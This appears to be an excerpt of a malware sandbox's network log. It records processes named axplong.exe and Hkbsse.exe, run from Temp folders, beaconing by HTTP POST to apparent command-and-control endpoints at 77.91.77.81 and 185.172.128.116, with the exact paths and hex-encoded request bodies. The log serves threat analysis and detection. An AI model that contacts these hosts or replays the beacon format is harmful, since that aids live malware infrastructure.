Jun 24, 2024 00:11:22.059212923 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:22.251446009 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.5	52990	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:21.543549061 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:11:22.259396076 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.5	52991	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:22.372961998 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:23.007739067 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:23.014650106 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:23.204437017 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.5	52992	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:22.378504038 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:23.065031052 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.5	52993	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:23.073848009 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:11:23.764780045 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.5	52994	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:23.321975946 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:23.982552052 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:23.984045982 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:24.186645031 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.5	52995	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:23.886192083 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.5	52996	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:23.904311895 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:11:24.589725971 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.5	52997	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:24.307719946 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:24.942193985 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:24.945183039 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:25.304959059 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.5	52998	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:24.718795061 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:25.415131092 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.5	52999	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:25.418777943 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:26.055059910 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:26.056009054 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:26.246710062 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.5	53000	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:25.426611900 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:11:26.111072063 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.5	53001	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:26.229765892 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:26.983937979 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.5	53002	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:26.368503094 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:27.009799004 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:27.013689995 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:27.205753088 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.5	53003	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:27.014508963 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:11:27.729377985 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.5	53004	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:27.322201967 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:27.961261034 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:27.962230921 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:28.153536081 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.5	53005	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:27.839708090 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:28.560498953 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.5	53007	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:28.275077105 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:28.910726070 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:28.914268017 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: 